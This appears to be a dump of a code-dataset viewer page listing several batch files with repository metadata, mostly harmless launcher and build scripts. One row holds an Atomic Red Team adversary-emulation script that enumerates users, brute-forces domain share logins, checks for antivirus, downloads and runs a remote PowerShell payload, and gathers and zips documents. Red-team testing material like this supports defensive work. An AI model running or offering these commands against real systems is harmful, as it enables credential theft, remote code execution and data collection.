text stringlengths 0 834k |
|---|
:error |
echo MySQL could not be started |
:finish |
exit |
",25.4074074074,137,0.6836734694 |
219459,d2ec63fdfdf0e1f58c17e397b161cfa813009ae2,23,bat,Batchfile,Software/launch notebook_windows.bat,Karpova-Lab/Syringe-Pump,c576e0850a6cf596cdec469bf0fd6f1446ca0460,['BSD-3-Clause'],15.0,2017-06-14T23:17:43.000Z,2022-03-17T08:40:18.000Z,Software/launch notebook_windows.bat,Karpova-Lab/Syringe-Pump,c576e0850a6cf596cdec469bf0fd6f1446ca0460,['BSD-3-Clause'],1.0,2020-09-30T15:25:44.000Z,2021-03-03T21:58:13.000Z,Software/launch notebook_windows.bat,Karpova-Lab/Syringe-Pump,c576e0850a6cf596cdec469bf0fd6f1446ca0460,['BSD-3-Clause'],1.0,2020-03-31T11:36:58.000Z,2020-03-31T11:36:58.000Z,cmd /k jupyter notebook,23.0,23,0.8260869565 |
219460,d2ec74aa324479557549b15536107cb2fdcdb7e5,1642,bat,Batchfile,on_success.bat,StatisKit/appveyor-ci,22aedac33f003a051a18b7072f91d359ac6e31e3,['Apache-2.0'],1.0,2018-12-13T16:52:27.000Z,2018-12-13T16:52:27.000Z,on_success.bat,StatisKit/appveyor-ci,22aedac33f003a051a18b7072f91d359ac6e31e3,['Apache-2.0'],,,,on_success.bat,StatisKit/appveyor-ci,22aedac33f003a051a18b7072f91d359ac6e31e3,['Apache-2.0'],6.0,2017-10-03T11:14:38.000Z,2021-03-15T18:21:59.000Z,":: Copyright [2017-2018] UMR MISTEA INRA, UMR LEPSE INRA, :: |
:: UMR AGAP CIRAD, EPI Virtual Plants Inria :: |
:: :: |
:: This file is part of the StatisKit project. More information can be :: |
:: found at :: |
:: :: |
:: http://autowig.rtfd.io :: |
:: :: |
:: The Apache Software Foundation (ASF) licenses this file to you under :: |
:: the Apache License, Version 2.0 (the ""License""); you may not use this :: |
:: file except in compliance with the License. You should have received :: |
:: a copy of the Apache License, Version 2.0 along with this file; see :: |
:: the file LICENSE. If not, you may obtain a copy of the License at :: |
:: :: |
:: http://www.apache.org/licenses/LICENSE-2.0 :: |
:: :: |
:: Unless required by applicable law or agreed to in writing, software :: |
:: distributed under the License is distributed on an ""AS IS"" BASIS, :: |
:: WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or :: |
:: mplied. See the License for the specific language governing :: |
:: permissions and limitations under the License. :: |
echo OFF |
call environ.bat |
echo ON |
echo OFF",56.6206896552,75,0.4494518879 |
219461,d2ec81671bcc3c0078ac2e672f5c956c7d4dd244,1879,bat,Batchfile,ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat,mahshahi/atomic-red-team,3c4a7b05a75c5ca9956155ca78582dc8c8413006,['MIT'],7.0,2018-08-14T06:48:46.000Z,2022-03-08T19:32:12.000Z,ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat,pr0b3r7/atomic-red-team,90502fe9d787ec45934f8d529306e1466bcf4579,['MIT'],11.0,2020-12-28T20:22:58.000Z,2022-02-26T10:26:32.000Z,ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat,pr0b3r7/atomic-red-team,90502fe9d787ec45934f8d529306e1466bcf4579,['MIT'],14.0,2018-06-26T22:22:46.000Z,2021-06-04T11:13:12.000Z,":: Chain Reaction - Reactor |
:: |
:: |
:: Tactic: Discovery |
:: Technique: System Owner/User Discovery: https://attack.mitre.org/wiki/Technique/T1033 |
:: Single Endpoint |
:: for /F ""tokens=1,2"" %%i in ('qwinsta /server:<COMPUTERNAME> ^| findstr ""Active Disc""') do @echo %%i | find /v ""#"" | find /v ""console"" || echo %%j > usernames.txt |
:: Multiple Endpoints |
@FOR /F %%n in (computers.txt) DO @FOR /F ""tokens=1,2"" %%i in ('qwinsta /server:%%n ^| findstr ""Active Disc""’) do @echo %%i | find /v ""#"" | find /v ""console"" || echo %%j > usernames.txt |
:: Tactic: Credential Access, Lateral Movement |
:: Technique: Brute Force: https://attack.mitre.org/wiki/Technique/T1110 |
:: Technique: Windows Admin Shares: https://attack.mitre.org/wiki/Technique/T1077 |
@FOR /F %%n in (usernames.txt) DO @FOR /F %%p in (passwords.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%%n %%p 1>NUL 2>&1 && @echo [*] %%n:%%p && @net use /delete \\COMPANYDC1\IPC$ > NUL |
:: Tactic: Discovery |
:: Technique: Security Software Discovery: https://attack.mitre.org/wiki/Technique/T1063 |
netsh.exe advfirewall firewall show rule name=all |
tasklist.exe | findstr cb |
tasklist.exe | findstr virus |
tasklist.exe | findstr defender |
:: Tactic: Execution, Discovery |
:: Technique: PowerShell: https://attack.mitre.org/wiki/Technique/T1086 |
:: Technique: Multiple Discovery |
powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')"" |
:: Tactic: Collection |
:: Technique: Automated Collection: https://attack.mitre.org/wiki/Technique/T1119 |
for /R c: %%f in (*.docx) do copy %%f c:\temp\ |
:: Tactic: Exfiltration |
:: Technique: Data Compressed: https://attack.mitre.org/wiki/Technique/T1002 |
cmd.exe /c powershell.exe Compress-Archive -Path C:\temp\* -CompressionLevel Optimal -DestinationPath C:\temp\allthedataz.zip |
",37.58,192,0.7110164981 |
219462,d2ec8a35fa716f1fa2c476f15c58e4ee039a4c8e,1016,bat,Batchfile,docs/make.bat,wangdong2516/iron_man,d3d33a2afce142d405cb74d5e251b7f66d070f58,['BSD-3-Clause'],,,,docs/make.bat,wangdong2516/iron_man,d3d33a2afce142d405cb74d5e251b7f66d070f58,['BSD-3-Clause'],,,,docs/make.bat,wangdong2516/iron_man,d3d33a2afce142d405cb74d5e251b7f66d070f58,['BSD-3-Clause'],,,,"@ECHO OFF |
pushd %~dp0 |
REM Command file for Sphinx documentation |
if ""%SPHINXBUILD%"" == """" ( |
set SPHINXBUILD=sphinx-build -c . |
) |
set SOURCEDIR=_source |
set BUILDDIR=_build |
set APP=..\iron_man |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.